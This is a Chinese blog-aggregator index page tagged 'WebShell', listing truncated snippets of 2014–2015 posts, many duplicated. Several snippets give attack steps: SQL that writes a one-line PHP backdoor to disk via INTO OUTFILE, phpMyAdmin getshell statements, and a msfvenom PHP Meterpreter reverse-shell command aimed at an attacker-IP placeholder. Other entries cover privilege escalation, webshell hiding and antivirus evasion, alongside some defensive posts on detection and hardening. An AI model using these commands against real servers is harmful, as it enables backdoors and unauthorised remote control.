WebShell

对FTP服务器(Serv-U)账户赋权不当造成的安全隐患

我们在上传网马后登陆webshell,其中有一项功能是Serv-U提权,建立管理员,与这里的提权有所区别,是以guest/network-services身份访问,通过Serv-U默认账户LocalAdministrator
CircleAgain·2015-02-16 22:43

Linux C代码实现cgi shell

C语言实现cgiwebshell#include #include #include #include #include #include #include #include #include #include
老徐_kevin·2015-02-05 14:31

Linux C代码实现cgi shell

C语言实现cgiwebshell#include  #include  #include  #include  #include  #include  #include  #include  #include
老徐_kevin·2015-02-05 14:31

wordpress密码的破解

如果通过某种方法拿下了webshell,拖库之后会发现wp_user这个wordpress这个用户表,里面的密码
续前程·2015-01-29 13:03

漏洞评级标准

文件上传获取Webshell。代码执行,远程缓冲区溢出。可利用的ActiveX堆栈溢出。SQL注入获取系统权限。服务器解析漏洞。文件包含漏洞。可利用浏览器useafterfree漏洞。
续前程·2015-01-29 13:46

当发现现自己管理的部署在tomcat下的系统受到攻击后,我所做的加固动作

当发现我管理的web项目的目录下多了几个不认识的文件后,意识到系统可能受到攻击了,文件如下图:红框里的就是可疑文件.然后查了一下数据库的系统登录记录,发现在SQL注入的记录.用编辑器打开后,看到了一些类似于webshell
ant_cc·2015-01-28 17:14

mysql 3.x拿webshell

mysql3.x拿webshell先建表字段 写入一句话查询导出一句话mysql>usemysqlDatabasechangedmysql>CreateTABLEdemo(sanrtextNOTNULL
serverxx0·2015-01-26 15:10

mysql 3.x拿webshell

mysql3.x拿webshell先建表字段 写入一句话查询导出一句话mysql>usemysqlDatabasechangedmysql>CreateTABLEdemo(sanrtextNOTNULL
serverxx0·2015-01-26 15:10

mysql 3.x拿webshell

mysql3.x拿webshell先建表字段写入一句话查询导出一句话mysql>usemysqlDatabasechangedmysql>CreateTABLEdemo(sanrtextNOTNULL)
serverxx0·2015-01-26 15:10

过滤union select 写webshell

满足条件mysql未降权未关闭file权限gpc关闭LIMIT0,1INTOOUTFILE'这里是路径'LINESTERMINATEDBY'这里是你想写的内容'--SELECT*FROM`user`where user='root'LIMIT0,1INTOOUTFILE'D:/xxxxx/demo.txt'LINESTERMINATEDBY'demo';
serverxx0·2015-01-26 15:21

过滤union select 写webshell

满足条件mysql未降权未关闭file权限gpc关闭LIMIT0,1INTOOUTFILE'这里是路径'LINESTERMINATEDBY'这里是你想写的内容'--SELECT*FROM`user`where user='root'LIMIT0,1INTOOUTFILE'D:/xxxxx/demo.txt'LINESTERMINATEDBY'demo';
serverxx0·2015-01-26 15:21

Uliweb增加在IPython notebook中显示Model的关系图功能

Uliweb现在已经可以支持IPythonnotebook,首先安装好IPythonnotebook,如:pipinstall"ipython[notebook]" 然后在某个项目下执行:uliwebshell
limodou·2015-01-24 22:00

MySQL/ACCESS导出一句话拿WebShell后门命令

MySQL:DropTABLEIFEXISTStemp;//如果存在temp就删掉CreateTABLEtemp(cmdtextNOTNULL);//建立temp表,里面就一个cmd字段InsertINTOtemp(cmd)VALUES();//把一句话木马插入到temp表SelectcmdfromtempintooutfileF:/wwwroot/eval.php;//查询temp表中的一句话并
abcdyeah·2014-12-23 22:27

MySQL/ACCESS导出一句话拿WebShell后门命令

MySQL:DropTABLEIFEXISTStemp;//如果存在temp就删掉CreateTABLEtemp(cmdtextNOTNULL);//建立temp表,里面就一个cmd字段InsertINTOtemp(cmd)VALUES();//把一句话木马插入到temp表SelectcmdfromtempintooutfileF:/wwwroot/eval.php;//查询temp表中的一句话并
abcdyeah·2014-12-23 22:27

FTP探测-挖掘鸡2014免费版

挖掘鸡就是针对这样的路径进行扫描来获取敏感信息或webshell等权限。
TRy_todo·2014-12-20 17:58

如何使用ssdeep检测webshell

最新版本的ModSecurity增加了ssdeep检测webshell的接口,于是猛地回忆起搞客户端安全(游戏安全)的时候买过一本书《恶意软件分析诀窍与工具箱-对抗“流氓”软件的技术与利器》,这本书就提到了使用
DevilRex119·2014-12-17 17:14

mysql 提权

(也可适用于WEBSHELL提权,此方法已被改进,不会弹黑CMD窗口.过段时间放出!)
SilenceGG·2014-12-06 14:00

简单绕过不能创建用户,幸运提权八核服务器

我们手里现在有一个小webshell,访问速度挺快,网站用途也算不小,我估计服务器配置也不很低吧。仅仅是估计。那么开工。先用菜刀执行一下cmd,看看是否可以执行。呐,这里呢是不能直接执行的。
USASilence·2014-12-04 22:13

Burpsuite截断上传拿webshell

Burpsuite截断上传拿webshell很多大大都在用burpsiute,大大们说这个工具的功能有很多很多,小菜我也不知到底是些什么。
qileilove·2014-12-03 13:00

网络安全系列之五十五 利用抓包来上传webshell

在Web渗透的过程中,最为麻烦的一个环节就是上传WebShell,之前曾介绍过利用数据库备份来上传,这也属于最为简单和古老的一种方法。
yttitan·2014-11-26 21:49

网络安全系列之五十五 利用抓包来上传webshell

在Web***的过程中,最为麻烦的一个环节就是上传WebShell,之前曾介绍过利用数据库备份来上传,这也属于最为简单和古老的一种方法。
yttitan·2014-11-26 21:49

浅谈渗透基础总汇

入侵介绍:1上传漏洞;2暴库;3注入;4旁注;5Cookie欺骗1、上传漏洞是常见的一种入侵形式,有的网站存在上传漏洞,然后通过上传漏洞就可以直接得到webshell形式::/upfile.asp、/uploadfile.asp
KingXai·2014-11-25 15:18

Discuz X1.5 X2.5 X3 uc_key getshell

一、DiscuzX1.5X2.5X3用uc_key来getwebshelluc_key是UC客户端与服务端通信的通信密钥。
KBK影院·2014-11-22 18:07

在php.ini中safe_mode开启之后对于PHP系统函数有什么影响呢?

主要我想还是用来应对webshell吧,减少被人植入webshell所带来的某些安全问题。
ww169920502·2014-11-20 20:23

SSH Web (webshell)

SSHWebGatewaymitdemOpenSourceToolshellinaboxDereigentlichfürdendirektenKonsolenzugriffüberWebgedachteDienstshellinaboxlässtsichhervorragenddazuverwendeneinGatewayfürSSH-Verbindungenherzustellen.Diesis
c__ilikeyouma·2014-11-19 00:00

Burpsuite截断上传拿webshell

Burpsuite截断上传拿webshell  很多大大都在用burpsiute,大大们说这个工具的功能有很多很多,小菜我也不知到底是些什么。
ymg01·2014-11-17 11:19

Burpsuite截断上传拿webshell  

Burpsuite截断上传拿webshell  很多大大都在用burpsiute,大大们说这个工具的功能有很多很多,小菜我也不知到底是些什么。
foreverzpk·2014-11-17 11:51

php Meterpreter Webshell

1. msfvenom -p  php/meterpreter/reverse_tcp LHOST=Attacker's_IP LPORT=443 T > ./a.php 2. 上传a.php到web服务器 3. 启动msfconsole 4. use multi/handler 5. set  LHOST Attacker's_IP 6. set LPORT&
j4s0nh4ck·2014-11-17 02:00

网络安全相关站点

经常会发布一些较新的漏洞文章)xss.hacktask.net(XSS漏洞利用平台)security.tencent.com(腾讯安全应急响应中心)www.hack-cn.com(全球被黑网站站点统计)www.webshell.ccwww.unhonker.com
zhaozhanyong·2014-11-11 17:00

网络安全相关站点

经常会发布一些较新的漏洞文章) xss.hacktask.net(XSS漏洞利用平台) security.tencent.com(腾讯安全应急响应中心) www.hack-cn.com(全球被黑网站站点统计) www.webshell.c
·2014-11-11 15:00

php shell超强免杀、减少体积工具

这不是webshell,只是个webshell免杀工具切勿当初webshell使用仅限免杀phpwebshell该工具运行在cli模式!如果有无法突破的文件内容过滤可尝试下用这个工具免杀大马!
KBK影院·2014-11-09 19:48

PHP后门生成工具weevely分析[转]

0x01摘要weevely是一款针对PHP的webshell的自由软件,可用于模拟一个类似于telnet的连接shell,weevely通常用于web程序的漏洞利用,隐藏后门或者使用类似telnet的方式来代替
KBK影院·2014-11-09 17:47

wso 一个强大的php webshell

下载点击下载转自:http://0x80c.com/file=/var/wso-%e4%b8%80%e4%b8%aa%e5%bc%ba%e5%a4%a7%e7%9a%84php-webshell
KBK影院·2014-11-09 16:06

开源Webshell利用工具――Altman

Altman,thewebshelltool,自己写的一款开源软件。
KBK影院·2014-11-03 23:56

老生常谈之SQL注入防范与攻击

Web安全简史在Web1.0时代,人们更多是关注服务器端动态脚本语言的安全问题,比如将一个可执行脚本(俗称Webshell)通过脚本语言的漏洞上传到服务器上,从而获得服务器权限。
zhaowmm·2014-10-26 19:00

MySQL数据库5.X版本基本手工注入总结(转)

根据我对MySQL的认识,注入时,基本可以通过爆、盲注、报错三种方式获得用户名和密码,在权限足够的情况下,还可以直接通过SQL语句插入并导出我们的一句话webshell
Riv3r·2014-10-20 15:16

【渗透】浅谈webshell隐藏

跟我一起念后门口诀:挑、改、藏、隐来个例子先,例一:只因为在目录里多瞅了一眼,只一眼,就认出了你。为什么你是那么的出众?可疑点:文件名、时间、大小。(有点经验的人能很快发现这些上传的木马文件) 1.后门的选择安全可靠(无隐藏后门,功能稳定。可以从可信度高的地方获取可靠的木马)多兵种搭配(小马、大马、变态马)常规马链接:http://www.xxxxxx.org.hk/china60/axdx.ph
sosly·2014-10-17 17:00

CrowdStrike:我们是如何发现Win64bit提权0day漏洞(CVE-2014-4113)

我们知道飓风熊猫使用的是“ChinaChopper”Webshell,而一旦上传这一Webshell,操作者就可试图提升权限,然后通过各种密码破解工具获得目标访问的合法凭证。
taokkcomcn淘裤网·2014-10-16 08:00

[译]查找后门shell

原文地址:http://resources.infosecinstitute.com/checking-out-backdoor-shells/一些上传webshell的方法1.本地文件包含漏洞-攻击者可以通过文件夹遍历特性
j4s0nh4ck·2014-10-13 23:00

如何快速删除网站黑链 安全狗批量删除工具

最常见的黑链就是通过各种网站程序漏洞,获取搜索引擎权重或者PR较高的网站的webshell,进而在被黑网站上链接自己的网站,其性质与明链一致,都是属于为高效率提升排名而使用的作弊手法。    
小猪猪的风·2014-10-10 15:00

网络安全系列之七 网站提权

上传了webshell之后,我们的目的是获取服务器的系统管理员权限,这也是******的最终目的。“H4ckDoor”是一个很牛的大马,提供了很多功能,我比较喜欢的是执行cmd命令来提权。
yttitan·2014-10-10 06:19

网络安全系列之七 网站提权

上传了webshell之后,我们的目的是获取服务器的系统管理员权限,这也是黑客入侵的最终目的。“H4ckDoor”是一个很牛的大马,提供了很多功能,我比较喜欢的是执行cmd命令来提权。
yttitan·2014-10-10 06:19

网络安全系列之六 利用数据库备份上传WebShell

在成功获得了网站管理员的账号和密码之后,我们就可以通过之前已经找到的后台管理入口来进入网站后台了。 此时我们就已经拿下这个网站,可以对网站的内容进行任意修改。但对于黑客,拿下网站绝不是目的,其最终目的是拿下整台服务器,使之成为自己的“肉鸡”。只是目前我们获得的这个网站管理员相比服务器的系统管理员的权限还有很大差距,因而下一步要做的工作就是“提权”,也就是获得系统管理员的权限。目前,提权主要是借助于
yttitan·2014-10-09 06:15

网络安全系列之六 利用数据库备份上传WebShell

在成功获得了网站管理员的账号和密码之后,我们就可以通过之前已经找到的后台管理入口来进入网站后台了。此时我们就已经拿下这个网站,可以对网站的内容进行任意修改。但对于***,拿下网站绝不是目的,其最终目的是拿下整台服务器,使之成为自己的“肉鸡”。只是目前我们获得的这个网站管理员相比服务器的系统管理员的权限还有很大差距,因而下一步要做的工作就是“提权”,也就是获得系统管理员的权限。目前,提权主要是借助于
yttitan·2014-10-09 06:15

通过PowerShell获取Windows系统密码Hash

用什么方法才能有尽可能高的权限,同时能更有效的隐藏自己,是留webshell,留后门,种木马还是Rootkit?webshell,哪怕是一句话木马都很容易被管理员清除,放了木马,也容易被有经验
fuhj02·2014-10-08 17:34

通过PowerShell获取Windows系统密码Hash

用什么方法才能有尽可能高的权限,同时能更有效的隐藏自己,是留webshell,留后门,种***还是Rootkit?webshell,哪怕是一句话***都很容易被管理员清除,放了***,也容易被
fuhj02·2014-10-08 17:34

利用webshell搭建socks代理[乌云]

https://github.com/sensepost/reGeorg 使用示例: pythonreGeorgSocksProxy.py-p8080-uhttp://upload.sensepost.net:8080/tunnel/tunnel.jspStep1.上传一个脚本(aspx|ashx|jsp|php)到web服务器上。 Step2.执行reGeorgSocksProxy.py脚本,连
往往搞·2014-08-30 20:17

Weevely工具使用详解[www.freebuf.com]

weevely是一款使用python编写的webshell工具(集webshell生成和连接于一身,仅用于安全学习教学之用,禁止非法用途),可以算作是linux下的一款菜刀替代工具(限于php),在linux
往往搞·2014-08-30 16:34

在phpmyadmin后台获取webshell方法汇总整理

方法一:CREATETABLE`mysql`.`xiaoma`(`xiaoma1`TEXTNOTNULL);INSERTINTO`mysql`.`xiaoma`(`xiaoma1`)VALUES('');SELECTxiaomaFROMstudyINTOOUTFILE'E:/wamp/www/7.php';----以上同时执行,在数据库:mysql下创建一个表名为:xiaoma,字段为xiaoma
lizhengnanhua·2014-08-09 02:55

在phpmyadmin后台获取webshell方法汇总整理

方法一:CREATETABLE`mysql`.`xiaoma`(`xiaoma1`TEXTNOTNULL);INSERTINTO`mysql`.`xiaoma`(`xiaoma1`)VALUES('');SELECTxiaomaFROMstudyINTOOUTFILE'E:/wamp/www/7.php';----以上同时执行,在数据库:mysql下创建一个表名为:xiaoma,字段为xiaoma
lizhengnanhua·2014-08-09 02:00
上一页 46 47 48 49 50 51 52 53 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他